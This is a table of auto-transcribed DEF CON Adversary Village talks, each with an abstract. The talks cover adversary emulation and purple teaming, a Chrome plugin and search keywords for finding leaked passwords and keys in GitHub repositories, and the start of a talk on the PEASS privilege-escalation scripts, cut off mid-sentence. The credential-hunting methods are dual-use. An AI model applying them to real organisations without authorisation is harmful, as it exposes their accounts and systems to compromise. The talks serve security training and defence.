doi
stringlengths 17
24
| transcript
stringlengths 305
148k
| abstract
stringlengths 5
6.38k
|
---|---|---|
10.5446/54351 (DOI)
|
Hello everyone and welcome to my presentation. My name is Samuel Kimmons and my talk is titled, Look at Me on the Adversary Now, An Introduction to Adversary Emulation and Its Place in Security Operations. Before I jump into the overview, I just wanted to give a big shout out to the adversary village. I'm very excited to speak to you all and all of you attending today. A quick overview of what I'm going to cover in my presentation. I'll go through the typical introduction of the who am I slide. I'll jump into an introduction to adversary emulation and the types of emulation. Yes, I believe there are more than one type of emulation. Then I'll jump into where adversary emulation fits into security operations. We'll talk about threat intelligence place in adversary emulation. We'll talk about emulation for detection testing and purple teaming, and then emulation as a training tool. Of course, I'll finish this up by giving you some resources so that you can get started with adversary emulation today. Then we'll cover the conclusion. Who am I? My name is Samuel Kimmons as I mentioned earlier. I'm currently a red teamer at an organization called Cognizant. I was formerly at a company called Recon Infosec, where I focused 100 percent on adversary emulation, so replicating TTPs, malware, and C2. I like to consider myself purple teamer and adversary emulator at hearts. Before Recon Infosec, I was in the United States Air Force, started out as a CIS admin, helped us type person, moved up to sock analyst, and then on to pin tester and red teaming and adversary emulation. So where I got tuned in on adversary emulation and where it could fit into security operations was my time in between sock analyst and red teaming. I started to really dig into the TTPs of how they affected an environment and what kind of behaviors we could look for. From the offensive side of how could I replicate these behaviors to help my organization? You can find me on Twitter at valcott underscore K or on GitHub at valcan slash K. The quick disclaimer that everyone has to throw out, thoughts and opinions expressed by me in this talk are my own, and do not represent those of my employer. Let's jump into adversary emulation and what it actually is. You might be thinking, isn't that just red teaming? Well, hint it isn't. It may be performed by red teams or pin testing teams, depending on what your organization has, but I feel like adversary emulation falls under that broader umbrella of offensive security, meaning that it has its place, but different teams may conduct those types of operations. To me, the active adversary emulation is being as true as possible to the threat intelligence when conducting offensive operations. Because without threat intelligence, you don't really have adversary emulation because at that point, you're doing kind of threat emulation or your standard adversary simulation. You're going to hear me throughout this talk constantly repeat, threaten tell, threaten tell, threaten tell because it's very important to this topic. The two primary types of emulation that I consider to be important. Of course, we have adversary emulation where we're replicating unknown threat actors, TTPs or behaviors. Of course, this is based on threat intelligence. An interesting thing I like to bring up is something I saw on a blog post from the former red team lead at Walmart, was that we are essentially just copycats, because we can only emulate a threat actor to a certain degree. That's typically because we only have a certain amount of threat intelligence on a threat actor's behaviors. This isn't uncommon. Unless you have a view into an adversary's entire kill train, you're probably not going to be able to replicate it to 100 percent. To be honest, that's okay because as long as you're getting a benefit out of the TTPs or the behaviors that you're able to replicate in your specified scenario. The other one, threat emulation. This one is one of my favorites too because you're not really focused on a particular threat actor. You're more focused on emulating TTP. Let's say we go to a minor attack matrix and we select one, we want to select WMIC for lateral movements, and we want to replicate that TTP in our environment. Determine if our detections are capable of detecting that or preventing that type of activity. It's cool because it's not tied to a specific threat actor. Several threat actors may use this technique, and in that case, a cluster of threat actors may use it, but they're not really important to us. When we talk about adversary emulation and threat intelligence, we're usually doing that because this threat actor has been known to target our organization. We want to be able to replicate what they can do in our own environment. Where does it fit into security operations? In my mind, it fits into the processes and people side of security ops. Typically, you would see sec ops broken down into three pieces. So processes, people, and technology. But like I mentioned, I'm going to focus on the processes and the people side, because honestly, the technology changes, but the people and the processes not necessarily remain the same, but those grow and continue to change with time as well. But it should be the methodologies that are solid from one tool to the other. So from a defensive perspective, regardless of what type of log analysis tool you're using, like a Splunk or a different scene, you should be able to still look for the same types of behavior, just using different syntax. So the methodologies are there, it's just the tools change. So on the processes side of security, so processes need development, testing, and refining. You may be thinking, where does adversary relation fit into this portion of sec ops? In my mind, it fits into purple teaming perfectly, because you're able to test those response procedures and also train your folks against specific TTPs, specific adversarial TTPs. And this is great, especially anyone ranging from Tier 1 sock analyst all the way up to your Tier 3 sock engineer or threat hunter. Everyone needs that exposure to these types of TTPs, and we can do that through purple teaming. And so I kind of bled into the people side of security ops when I was talking about processes, because you don't have the processes without the people. And so people need ways to improve and test their skills. And I believe that training through adversary relation exercises is one of the best ways to do this. Now you may be thinking, what about your traditional red versus blue exercises? Typically, those are objective focused, right? Like the red team has an objective that they're trying to accomplish, and it may not necessarily be to train the blue team. Sure, overall, it's to make the security posture of the organization better, but that may not be their primary objectives. And so when you throw in the adversary emulation exercise, they become even more natural sparring partners, where they're working in tandem to improve each other's skillset while improving the overall security posture of the organization. So which type of emulation is the right one? To me, you follow the simple formula for success. First, we'll need to determine if this will be for the processes or the people side of security ops, and ask yourself the following three questions. Number one, are you trying to detect or defend against a specific threat actors, TTPs or behaviors? And now in my mind, this is leaning more towards adversary emulation because we're focused on a specific threat actor, their TTPs and their behaviors. Onto number two, are you simply wanting to improve your detections against general TTPs? Now we're leaning more towards that threat emulation adversarial simulation side of offensive security, where we're focused on improving the detections of our detection and response team, as opposed to trying to stop or detect a specific threat actor. And these kind of go back and forth, right? So we can apply adversary emulation to this one as well, but we're more focused on the TTP rather than who the threat intel says it's tied to. In number three, are you wanting to train your defenders? If so, you can apply a variation of the previous questions to the scenario. So for example, we could say that we want to emulate a specific threat actor because we want our defenders to have exposure to that threat actor because they're known to target, for example, our organization, a finance organization. But we're also testing our detections against TTPs. Sure, they may not be specific to that threat actor that we're trying to detect, but by combining these two, we can actually have a pretty great exercise where we're benefiting both the processes and the people because we're testing those response procedures and we're improving the skills of our defenders. And maybe wondering, I keep mentioning threat intelligence for adversary emulation. What does it fit into these questions? Well, when we look at number one, without threat intelligence, we don't have adversary emulation. And even on number two, sure, we're talking about just detecting general TTPs. But if we look at something like Red Canary's report on the top TTPs, we can see that several threat actors are using these TTPs, and that's based on threat intelligence collected, found in the field or in their organizations they're defending. But where does it fit into adversary emulation? I mentioned this several times, you can't accurately replicate a threat actor without threat intelligence. Threat intelligence allows us to get as true as possible to an adversary's actions. And then, I said early on in the first two or three slides, that you may not be able to get to the 100% mark, right? And that's okay, because if we're aiming at replicating a threat actor's C2, we might be able to do that with open source tools or custom develop tools. But if we're talking about endpoint analytics, we can probably replicate those to generate those types of logs or events. We may not be able to replicate the exact programming language that a threat actor uses if we don't have that threat intelligence. And that's okay too. But emulating an adversary who is known to target your organization is much more valuable than standard threat emulation. And that goes for adversary simulation as well, that your typical red team would do, and that's okay because they're focusing on specific objectives. They may not be tying in threat intelligence to their operations, but they may happen to cover some of those TTPs a threat actor might use. But if it's not tied to one that might target your organization, that could throw off the importance of the findings. So let's talk about emulation for detection testing and purple teaming. But first, I'm going to cover kind of my view on the purple team methodology. I'm sure it's a pretty common one out there. So first, we'll start out by selecting a TTP or an adversary TTP. See, we could apply both threat emulation and adversary emulation to this purple team engagement. Formulate a plan of action, that means all parties involved will formulate a plan of action. They will execute their plan of action. They will validate their findings, and I'll move on to the final step, but it's not a final step because it's a continuous process. So if there's no detection, they will either tune or create and start again. So let's take a look at a more detailed version of the purple team methodology. So we'll start out with the TTP. We're going to select lateral movement via WNIC because APTX uses this method, and they just so happen to target our organization. So we want to be able to detect and possibly prevent that type of activity. So in the development stage, both the offensive and defensive team will develop their capabilities. So the offensive team will develop the TTP based on threat intelligence. The defensive team will develop a signature based on threat intelligence if one is available. And the testing, this is key because all teams need to execute their plan of actions because if the offensive team executes their plan of action and there's no response from the defensive team, we may be in trouble, so we may need to go back to the beginning of our wheel and redevelop our plan. And so on the validation stage, this is really important because it goes several ways. So the offensive team will either determine if they were successfully able to execute their task, or was the blue team or the defensive team able to successfully detect it. And those are very important to keep in mind when doing purple teaming with adversary emulation. And so if it was detected, we can move on to the next TTP. But if it wasn't detected, we can start the cycle from the beginning where the detection team can develop or tune the signature. And you're probably wondering, this seems like a lot of work and very resource and process and intensive. And it can be depending on what you're trying to replicate from a specific adversary or a specific tool set or a specific piece of malware. And yes, it can be automated. It will take a little bit of development or purchasing a specific tool that allows you to automate it. I won't name any because there are plenty out there. But using the local resources you have, even the offensive team could add this payload or add this technique to a script, a PowerShell script, if we're in a Windows environment. And then the defensive team can execute it whenever they'd like to improve that detection technique or the TTP. And it can go both ways, right? We can automate a lot of the defensive piece using a tool like a SOAR. So once the offensive team develops that TTP, they feed it into the SOAR. So then we have another method of automating it. So to break down kind of the threat intelligence piece to developing this purple team for our adversary emulation exercise. So we're starting out with WMIC for lateral movement. And that is technique T1047 from MITRE ATT&CK matrix. And you can see the link on screen. What do you know? Not Petia, the malware happens to use this. So it may not be tied to a specific threat actor, and that's okay. We're covering a pretty broad technique, one of the top methods for lateral movement. And then we see on number three that the new ransomware variant, Netia, also compromises systems worldwide and happens to use this technique. If we look into the threat intelligence available on MITRE ATT&CK, a blog from Talos Intelligence shows us the exact command that this malware or threat actor uses to execute commands remotely on another system. And so this is great. This type of intelligence is great for adversary emulation for both the offensive and defensive side. So the offensive side, we already have the command ready to go. We may need to do a little bit of development so it runs in our specific environment. And then the defensive side is also ready to go because they can build signatures around these specific command line parameters. And there may be some obfuscation that can take place, but that's why that continuous loop happens for the purple team engagements with adversary emulation, because we can feed that back through and build new signatures or look for those detections. So when you're first starting out with doing adversary emulation for purple teaming, it can be tough to keep track of the signatures or the TTPs you want to signatureize. And honestly, a simple spreadsheet like this can help you get started. Documenting the TTP, do we have a signature for it? Have we tested it? Is this a high or a low priority? Is there any relevant threat intelligence key? Adversary emulation, relevant threat intelligence? And do we have a date that we would like to test this on? And honestly, this is as basic as it gets, low resource intensive, and it helps you keep track of what you need to test. So adversary emulation as a training tool, and this fumes more on the people side of security ops. So I've mentioned this several times because it's really important. Getting your defenders, getting them exposure to threat actor TTPs and their behaviors is very important because when they do in a training situation, like you can with some of these public and private trainings, and then they happen to see that type of activity in their own networks, that really helps them clue in on what to pivot on or, okay, I'm familiar with what comes after this TTP normally that a threat actor would. So for example, once a threat actor drops a payload, they start enumerating active directory, they might be looking to move laterally. So if we catch it at that point from a defensive standpoint, we can say, okay, let's look for lateral movement techniques. Oh, what do you know? We just talked about one using WMIC. So let's look at that for potential movement across the network. And so I mentioned there's public and private training for this. A lot of them are happening at DEFCON and Black Hat and other conferences, or you can talk to those companies individually. But on the free side, free as in free to attend, but you might have to pay for a conference to get in, CTFs like Open Sock. So I'm a little biased because I used to work at recon and do a lot of development on the Open Sock CTF, which is ran at DEFCON every year. That's one of the best ways to get exposure to real adversary emulation, because when I was doing it, I had to actually develop the same exact payloads and malware that the threat actor might use. And then we move over to Boston The Sock from Splunk, obviously the Splunk tool isn't free, but there is a free-ish version you can get to use for Boston The Sock, the data set that's available. But that threat research team that puts that out is amazing. They put a lot of content out there to give you the exposure to real-world TTPs. And while it may be focused on using their tool sets, like I mentioned before, it's the methodologies that are key and not the tools. So you can take those same concepts and bring them over to great levels. Bring them over to Greylog or another tool. And then we have something like Net Wars from Sans. Cost a little bit to try it out, but it is a great exposure to a general amount of TTPs, not really specifically tied to a threat actor. But it's great if you're first starting out and you want to kind of get exposure to those, or you want to try out some of those offensive TTPs yourself. And then there are hundreds of CTFs that go on every year. Check out ctftime.org. There's probably one going on every single weekend this year. And while a lot of them are focused on just hacking specifically into a crazy puzzle, it's a great way to get you familiar with the tool sets and the methodologies of conducting exploitation or moving laterally. And then you can take those and apply those to your actual offensive engagements, where necessary or where possible. So my favorite slide in the talk, is because this is where I give you the resources so you can get started. So let's talk about labs. So the labs can be a controversial thing because it's either you have a lot of resources to build one, or you have very minimal resources. And so try to choose a good range of things that could be done on multiple types of systems with resources limitations in mind. So Detection Lab, that one's more on the higher resources in, because it'll pull down several images, a DC, I believe they even put in a SQL server on there recently. Within the last year, I think of the developers even trying to work on the print nightmare one as well, putting that exploit in there, so you can actually exploit and test and see what it looks like. And that's cool thing about Detection Lab, is it allows you to spin up that environment, look at the logs, do some detection engineering, or getting familiar with different attacks in that environment. Keep in mind that it's downloaded several images, isophiles, that take quite a while depending on your internet connection. So keep that in mind and your hard drive space. And then we move on to Splunk's attack range. The Splunk team does an amazing job of developing different TTPs. They have a way of incorporating atomic red team from Red Canary. It's a great way to get exposure to new techniques that are out there, or you want to help build your own detection. If your company happens to use Splunk. But as I mentioned before, using Splunk isn't the end all be all, because those same methodologies will move over to a different analysis tool, or a different data analysis tool. And then the best place to start if you're just getting started, or you want to simply test something before you run an operation, is a few virtual machines and a log analysis tool. So a Windows 10 box set up a help server from Simon Wardog, very minimal. I think there's a four gig configuration you can run to feed those logs into an Elk stack, so you can actually analyze what your activity is doing in an environment. And that's like the most basic way. I think you can get away with maybe like eight gigs of memory across those potentially two or three. OS is running at the same time. So keep that in mind when you're building out a server or a system, so that you can do this type of testing on your own, this type of adversary emulation testing. So let's talk more about the tools to help you feed into those labs, or that custom lab you happen to build. So we mentioned atomic red team from Red Canary. The developers on that are super active, and they're all amazing. I suggest you go check out their Slack channel, and of course their GitHub repo. And they seem to be always adding new TTPs to their tool set. And I really suggest you want to take that, throw it in your lab, get familiar with different TTPs, different MITRE attack techniques, and especially if you're on the defensive or the detection engineering side, this is a great way to get exposure without having to worry about getting your hands on the latest and greatest C2 tool or latest and greatest malware. Because when it comes down to it, they're just replicating specific TTPs, and you can do that with atomic red team. If you want to get a little more adventurous, you can look at something called Caldera from MITRE. Recently, they started putting in more development time to it. It's becoming a great tool. It's kind of like a pseudo red team tool. It allows you to build a payload, a binary payload, throw it on a target host, execute commands through that payload, just like you would with C2 tools like Cobalt Strike or PowerShell Empire, those kind of things, or Mythic is another one. And then the other option is custom development. So I mentioned that in an earlier slide where I was talking about, can this be automated? Yes, using custom development, we can have our offensive team, even if it's your pin testing team and you don't have a red team, you can have the pin testing team or the offensive team develop custom tools or custom scripts to run these adversary emulation exercises in your lab, or in your production environment. Obviously, you're smart about what you're doing, but you can run them in your detection environment so that you can build detections or help refine those processes using that purple team methodology we talked about. And so on my GitHub, I actually put a script on there that will help you automate a lot of the stuff if you're going for that simple, few virtual machines set up like a Windows 10, an Ubuntu server for logging, and maybe a Cali for an attack host. This script will basically download Sysmon, Winlog Beat, it'll help you set up forwarding all the logs, and then it'll also download atomic red team so you're good to go, all you have to do is type in the atomic red team, invoke atomic red team, run the TTP you want to run, and now you have logs shipping to your help or your elk stack depending on what you decide to set up. And keep in mind the resources can be intensive depending on what you're trying to do. And some great references to help you get started with looking at threat intelligence for adversary emulation is, first off, MITRE attack, MITRE attack, you'll cure it probably all day, every day at every conference you go to or every blog post you see, but it's very important, right, because it's got a way of breaking down TTPs in a readable manner. And they're also great about including threat intelligence to back up those TTPs. And that's a great point when it comes to threat research, that's your pivot point, right? So I found my TTP, I found relatable intelligence, I'm going to go keep searching for that type of Intel or these types of threat actors that might actually use these TTPs or these tools. And so my favorite one is, it's not really a MITRE attack matrix style website, but it's called NALpedia, right? And it's one of my favorite places for threat intelligence gathering is because you simply search the type of malware or C2 or threat actor that you're interested in, right? So for this one, I looked at Petya, right? And I came up with the eternal Petya. It can show you which types of families it's part of. It'll link different blog posts, different reports from different vendors, the open source ones that you can get access to without paying for a subscription. And it's an amazing place. I don't believe it's easy to get an account on there, but a lot of the stuff is free. You just simply go to their search page and start typing away. I used to use it all the time and I still use it all the time when I'm interested in finding out how to replicate a specific threat actor. Because a lot of the times when you go to something like MITRE attack matrix, they'll have four or five possible references at the bottom, right? But honestly, that's not enough when you're building out a full campaign or you want to build out a full purple team operation using Azure simulation, or simply when you want to train your defenders against a multitude of a threat actor's TTPs. One report from MITRE attack matrix might give you one or two TTPs. You come over to Melpedia and you'll probably find 10 to 15 different articles or blog posts about a specific threat actor and information surrounding their objectives. And that's something else I didn't mention is when you're doing adversary emulation, you want to be objective focused just like you are with RIT team engagements. Because the adversary has an objective. It could be to gain access just simply to sell access or they want to gain access to ransomware your data or collect your data and sell it somewhere else. There's always an objective in mind and it's most likely financially motivated. So keep that in mind when you're doing your research. Okay, so my favorite part in addition to the resources slide is how can you get started. So I gave you the resources to get started on a lab to get started with some pseudo adversary activity using red canaries atomic red team and MITRE's caldera. And then of course custom development because I always encourage that that's the best way to learn is to get your hands on the code and start writing these TTPs yourself. Even if it's simply W. Mick, you know, process call create on the target host. That's enough to get started. So the three steps I like to include when I'm doing adversary emulation or I'm, you know, I'm building out an adversary emulation scenario is first off threat intelligence is key. I mentioned that several times because it is key. You don't have adversary emulation without threat intelligence. Well, you don't have successful adversary emulation without threat intelligence. So step one, we're going to select our threat actor and our relevant threatened. So we're going to pick a PTX. We're going to go to MITRE. We're going to look at the specific references they have what TTPs they happen to use will hop over to Malpedia look for subsequent articles or blog posts about interactions with these types of threat actors in different environments. What what they do in their environments, what they do, what they do when they're in the environments, what their objectives are. They'll move on to step two. So this is the most resource intensive part, depending on what you're trying to replicate. If you're trying to replicate a threat actor specific malware or C2, depending on the capabilities of your team, this could be resource intensive. So but in this step, we're going to develop and replicate those TTPs. If it's a simple command line action, that's easy. That's straight from the threat intel. We just need to modify it a little bit. If it's an actual payload, that may take some time. So keep that in mind when you're doing this type of development. If you're trying to be time sensitive. And then step three, we're going to execute our actions. And depending on how we went, if we went specifically for a purple team operation or simply just giving our defenders exposure to these actions, this is the final step. And so when you add all three of these together, you get successful adversary emulation. And I'm going to mention it again, because it's very important. Threat intelligence is the key to successful adversary emulation. Okay, so I just wanted to give another big shout out to adversary village. All of the people watching today. Thank you so much for attending my talk and my final parting thoughts on adversary emulation. So adversary emulation can help you improve the overall security posture of your organization through testing, validating capabilities, or simply improving the people who are watching. And also simply improving the people behind the processes, because when it comes down to security ops, or the defensive side of security and even the offensive side, the people are the most important. And they need to be able to refine those processes that help them defend their organizations. So once again, thank you so much.
|
Adversary Emulation is quickly becoming a hot topic in information security, and there is a good reason for it. Security analysts, threat hunters, and incident responders are constantly facing an onslaught of old and new threats. How can defenders properly prepare for the ever-changing threat landscape, improve their skill set, and improve the security posture of their organization? In this presentation I'll answer those questions by covering: The various forms of Adversary Emulation, where/how it fits into Security Operations, Threat Intelligence, the benefits of using it as a Blue Team training tool, and how to get started!
|
10.5446/54354 (DOI)
|
Hello everyone, welcome to the talk Red Team Prudentials, Old with a Twist. This talk is presented in Defcon 29, Adversary Village. About me, my name is Shantanu Khandelwal. I am a cyber security manager at KPNG. I enjoy working in cyber security and have been working in this industry for almost five years now. My journey started with my master's degree in cyber security and incident response. I also have some certifications like OSEP, OSCE, OSCP, etc. This is my first talk at Defcon, so hopefully everything will go fine. The disclaimer here, the opinions expressed in this presentation and on the following slides are solely those of the presenter, that's me, and not necessarily those of KPNG, Private Limited. KPNG does not guarantee the accuracy or reliability of the information provided herein. Okay, so that's done. In this talk, we are going to walk through some of the basic introduction of GitHub, a description and a small walkthrough of current GitHub reconnaissance methodologies. We will also discuss some drawbacks of these methodologies. Then I'm going to introduce a tool which I wrote named as Cred Stroller. We'll also do a walkthrough of it. We'll also talk about some of the future work that can be done to improve the tool as well. So why are we here and before we start this talk, I want to go over the reconnaissance quickly and how it fits inside an adversary simulation or emulation methodology. The reconnaissance is the first step in the kill chain as we know. As a red teamer, we often do it before the initial compromise phase and everybody in the first set keeps saying information gathering or reconnaissance is the most critical steps. It's one of the most critical steps. Okay. What is reconnaissance? Okay, so in generally we refer reconnaissance as to find emails, subdomains, IP ranges, leaked passwords, etc. for the target organization. In this talk, we are going to focus on the sensitive data exposure by GitHub. So what is GitHub? As per Wiki, it is a provider of internet hosting for software development and version control using command line tool called Git. Developers use GitHub for storage, sharing projects, collaboration, data transfer, etc. From an adversary's perspective, GitHub is a gold mine. It is mass used and its mass usage makes it a prime target and developers use often, and developers often use this, often use GitHub and they unknowingly commit proprietary source code or credentials to the GitHub repository. Interesting information in repository. So we can find several critical information inside GitHub repositories like user names, passwords, keys, email addresses, subdomains, proprietary source code even. We can also find software stack from there as well. In this talk, we are going to focus on the credentials part. So one of the ways which we do GitHub reconnaissance is manual reconnaissance. Searching for the company and then password will find stored passwords in configuration file. Searching for company connection string will find database credentials. You can also look for SSH passwords using the keyword SSH2 underscore auth. Send keys is my personal favorite. It can find you automation scripts used by the testers who are also sometimes not security savvy and commit passwords to the Git repositories. There are some docs which you can use to find sensitive information as well. Many researchers have blog posts on it. Here is one of the lists which you can use. You can find other lists as well. So here is the first demo. Hopefully it will go well and then we can move forward from there. If I go to GitHub and search for redteam.cafe, you can see that there is 21 results. There are several repositories like test1, test2, domain France, etc. Let's see if we can use a team.cafe and then the keyword password to look for passwords. If I search for passwords, now we have come down from 21 results to 5 results. We see passwords here, we see some passwords here, some telephone passwords here. We also see some send keys passwords here in the automation scripts. We also see one of these results where redteam.cafe is here and then we also see a password. Of course this one is not related to the credentials because it does not list any passwords. This is the manual searching. You can use password or API or any other keywords which you like to search for passwords or secrets. I don't see any API keys being exposed here. There is none here but we can actually use other keywords here as well. I just want to bring your attention to one thing which I mentioned very briefly last time. There are two or three repositories which are coming up. Test1, test2, and then there are some other repositories as well. Keep in mind these test1 and test2 repositories as these have been uploaded and designed to showcase the real impact of the Kretz roller plugin which we will discuss later. That's the end of the first manual reconnaissance demo. Coming back to our slides again. In the manual reconnaissance we saw that we can find passwords like here. We see that there are send keys passwords, there are web config passwords, and then there are FTP passwords here. Moving forward, basically a question comes to my mind that are we losing some of the data or are we getting all of these passwords which are leaked by Red Team.Cafe. Just thinking how GitHub search works is that if you put two keywords such as company name and password in the search bar, we are actually finding the results in which both the keywords, the company name and passwords are inside. One file will have these both keywords company name and password. There were also results which had just the word password but it contains no passwords. Just keep that in mind. Another approach to search for passwords is using automated approach which is using the current tools namely Trufflehog, Gitsecrets, GitScan etc. The disadvantage of using these tools is that these tools will only search for the repositories within an organization for a specific user or in a specific repository. Why this is the case is because GitHub does not currently allow you to search all of its repositories using API. Previously it was allowed but now it has been disallowed because of the abuse of searching passwords inside repositories using APIs. This API for searching passwords or any keywords on GitHub has been discontinued I think since two years now. Why these are working is because GitHub only provides searches inside an organization, inside a user repository or inside one specific repository. Let's quickly do an automated reconnaissance demo and then we can go to our new tool which I have developed and look at that as well. Quickly let's do an automated reconnaissance demo. Here I have him using Trufflehog. In Trufflehog we can search for credentials here. How to use this Trufflehog is in Trufflehog and then if I provide keyword rejects and then I can go and take one repository. I will take test one and then I can pass in the argument and if I click enter it will search inside that repository and find me passwords. I can see that it has only found me one password here which is also not very visible and it only shows high entropy etc. You can already see that in the manual reconnaissance we found more passwords. I may be running this tool wrong. I'm not too sure but I can definitely tell you that I have used many other tools. They will never always find you all of these results. Some of them will miss something or the other. This was a very small demo of the current tools. If Trufflehog author is watching me please let me know how to use this tool. Moving forward, we saw in automated reconnaissance that it barely finds one password. Even if it finds all the passwords we have to give all of these repositories line by line. It will become difficult for you to find all of these repositories because if you are searching for a very big organization you will have hundreds of repositories. Providing hundreds of repositories and passing it as command line will be very difficult. Finding passwords like this which is not very high lightable will have more difficulty as well. This brings us to QuetzTroller yet another GitHub search tool. QuetzTroller is developed by me. It is an automated reconnaissance tool. It's a Chrome plugin made in JavaScript. QuetzTroller searches for the company name first and then after the search completes it will actually go inside each of the repositories which mentions the company name. Then it will try to search for the password inside that repository. QuetzTroller also allows you to do a Reject search. The Reject search is mentioned as lucky results. Why do we need QuetzTroller? QuetzTroller is searching for credentials using Rejects. GitHub does not allow you to search Rejects. This is one of the major advantages. It allows you to search inside the repositories after matching the company name and then you can go and search for the keywords. It has two types of results, all results and lucky results. The lucky results are based on a Rejects which is a customizable Rejects. It is very easy to deploy and does not need any expertise. It's a Chrome plugin so it's very easy to use as well. Both Blue Teams and Red Teams can use it. Blue Teams can use it to monitor credentials for their organization while Red Teams can use it to search for the credentials inside many repositories. This search is in depth and it will have more passwords than just searching for two or three keywords. It also has an advantage that it runs in background. Once it starts, you can actually come back at a later stage and see all the results. This is particularly useful if the search results for your company name which you are searching are very large. How can Stroller work? Think of this as a browser. Once you open your browser and use the Crest Stroller, the Crest Stroller will search the GitHub using the UI and it will try to get the repositories. Searching for the UI is for the company keyword. Once it gets the repositories, the repositories are sent to the API to search for the keywords. This section is all for the keywords. Once we get the repositories, these repositories are now sent to the API to search for the keywords. Once the keywords are searched, all the search results are stored in all results. Till here, no regular expression has been applied. If the file contains a getPassword method, all results will have a getPassword method in its output. After all of these results are gathered, all of these results are now filtered using these rejects and then we get the lucky results. Lucky results are basically a subset of all the results and it comes from all the results after applying the regular expressions. A lot of talk already. Let's see the demo and hope it works. Let's go back to GitHub again. I hope everything is visible. Maybe I can increase some font size. If you click on the cratesroller plugin, which I have installed here, there are many buttons here. I will go through all of these buttons here as well. Of course, Submit Search is for the searching. All results are, as I mentioned previously, all of the results. I am feeling lucky button is for the lucky results. You have these two buttons for clearing the results and the lucky results. You have the save configuration and the load configuration as well. These two fields are for the tokens. I will share with you later what these tokens are. Or maybe you know GitHub tokens and GitHub username. These two buttons are basically default search keywords and default rejects. You can modify it as per your liking. Today I have modified it to use only two keywords. I have kept the same rejects. I will put retime.cafe here. What this will do is it will search for retime.cafe as a company name in all of the GitHub repositories. Once it finds those repositories, it will go and search for all these keywords, which I have separated by comma. It will find these keywords inside all of the files which we found in the repositories. Then it will parse it with this rejects and see if there are any lucky results. Those lucky results will be saved in the lucky file, which we can see later. Let's quickly submit the search. The search takes a bit of time. It will go automatically to all of the pages. Once all of the searching finishes, it will stop. The searching from the UI has stopped, but the background mode is still working. To see how it works and the background mode working, we can come back to the Credits Roller plugin. We can click on Show All Results. All results are basically, as I told you previously, all of the results. If there is a password word anywhere, you can see the password here. Of course, this is too much overwhelming. There are so many results here. You can keep scrolling and these are being still added. There are so many results. You can find so much data here. We found some usernames and passwords here as well. Basically, as I told you, all results are definitely all of the results which Credits Roller can come up with. We are also interested in the lucky results. Lucky results are the results which are parsed and retrieved from all of the results after using the regular expressions. I think this one is still populating. Let's wait for a few minutes and come back to it once all of the results are populating. In the meantime, you can see that it has already populated one result which was not shown to us in the first manual search. We searched for retina café and the password. This specific keyword and password was not shown there. Let's see and let's hope if this is already updated. It is not updated yet. Let's wait for a few more minutes. All of the results have been populated now. We can see that it has found a lot of passwords. It has also found some passwords which we didn't find the last time. It has also found passwords which I didn't intend to find in the first place. As long as it works, I am great. Of course, you can see that there are some false positives like these. This tells me that there is some automation script which I can go and see inside this specific repository. It is still useful. I will not say this is completely useful but this gives me an idea of what may be inside this repository. We come back to the results here and we can see that it has found some passwords here. This password was definitely not found in the first manual search. Why? Because this specific file, if I go to this file, you can see that there is no mention of retina café. If there is no mention of retina café, the combined manual search of retina café space password will definitely not find this file. There is no mention of retina café in this specific file. I can say this is the best scenario of why you should use Crestroller. Crestroller is actually able to find these passwords which are hidden inside configuration finds and may not have the company name inside those files. Coming back to the slides, as you can think, this can also be abused for mass credential gathering. I will not deep dive into that because that is something I will leave it up to your imagination. If you provide right rejects, then you can do anything you want from this tool. For the future improvements, there are some GitHub API restrictions which we think we should bypass or we should try to overcome. That is why we were using two keys. We can use many keys. The more keys you use, the faster the search is. I am definitely thinking to add the cron job functionality because this will greatly increase the usability of the tool. I can run it in the background and it will keep searching after every one hour. Anytime there is a credit leak, I can quickly get a notification on my text. We can have an export to CSV because that is very important. Sometimes we need CSV to show to the management. We can also think of adding more rejects. If the community wants, they can add more rejects and keywords. We can have multiple keywords and rejects for people to use in the future. If you have any questions, please let me know using the Discord channel. That is it. Thank you. If you have any questions after this talk, you can contact me on Twitter. You can also find me on my website. That is it. Thank you. Have a nice day. Bye-bye.
|
This talk covers the basics of credentials reconnaissance performed for a red team. Mostly covers the reconnaissance performed on GitHub to search for leaked passwords by developers. The current toolset and the Shiny new GitHub Credentials Stroller which dives into each repository and performs a deep scan.
|
10.5446/54359 (DOI)
|
So first of all, thank you very much for having me here today. I'm very excited to be here at Defcon in the adversary village. And I hope you like this presentation, which is called New Generation of Peace. We are going to discuss a little bit about this piece and why is there a new generation. My name is Carlos Pólleb. I work as senior security engineer at Merle. I have some certifications. I play CDF and all these stuff. So if you want to know something else about me, just take my link in. And you can also contact me via Twitter or even email for the more traditional stuff. So in this talk, we are going to talk a little bit about the peace suite, what it is, why is it useful, why is there a new generation. Then I'm going to very briefly introduce Hactress and how can it be useful in combination with the peace suite. And then we are going to see some demos about Limpies, Mac Peace, and Wimpies. At the end, we are going to very briefly see what is a both piece, the last being edited just one or two months ago. And then I want to talk a little bit about the to-do in order to indicate the community how you can help to the peace suite if you like it. So, suite piece. The name peace comes from previous escalation, not some script sheet. But basically, this suite is a combination of scripts that will allow you to enumerate the most common hosts. And I'm talking about Windows, Linux, Unix in general, and even Mac in order to find easy ways to escalate privilege. So before the peace suite, there were already a few scripts that performed these actions. But I liked them, but I didn't feel very comfortable with them because there were a lot of data that was mostly useless, and I didn't want to lose my time reading this data and figuring out if you can use it in any way or not. And because they didn't have enough text, or at least they didn't have the text I wanted to enumerate. So that's the reason I started this suite. So in peace, you are going to find very comprehensive scripts for enumerate hosts and see how hard they are and how you can escalate privilege. You are not going to find endless data lists, so you are going to know where you need to focus in order to find these vulnerabilities you are looking for. They have more text than any other tool, at least. I tried this, and this is because I mostly had probably one new check per week, so that's a very, very cool way to update the scripts. As we have said before, the peace can be executed for Linux, MacOS, mostly any Unix flavor, and also Windows, which is great. Anything is the only privilege escalation enumeration tool that can be executed in this amount of different operative systems. But I think the fact that most people love about the peace is that the output is colorate. This means that you are going to find, for example, the color red where something is suspicious, or the color green where something is well configured. And this is very useful in order to know where you need to focus or where you should focus in order to try to find vulnerabilities. Last of the characteristics is the monitoring decision. So we will talk about this later, because actually, you cannot use any monetization at the moment. But my idea with these peace new generation scripts is that you are going to be able to execute the peace in a host as frequently as you want, and be able to compare different results in order to see how good you are doing hardening your systems. As I have said, this is not available yet, but I hope this will be soon. Well, the more help the community gives me, the sooner this will be prepared. But before going into depth with peace, I want to show you what is Hactress, because this is going to be highly useful when using these tools. So I'm going to open this link. And you can see that Hactress is basically a book group, a book with a lot of cool tricks of hacking. But now I want us to focus on the previous escalation checklist for Linux and Windows. And in a few weeks, I hope I will create one specifically for Mac, where you can basically see some checklist of things that you should search on each computer in order to try to find 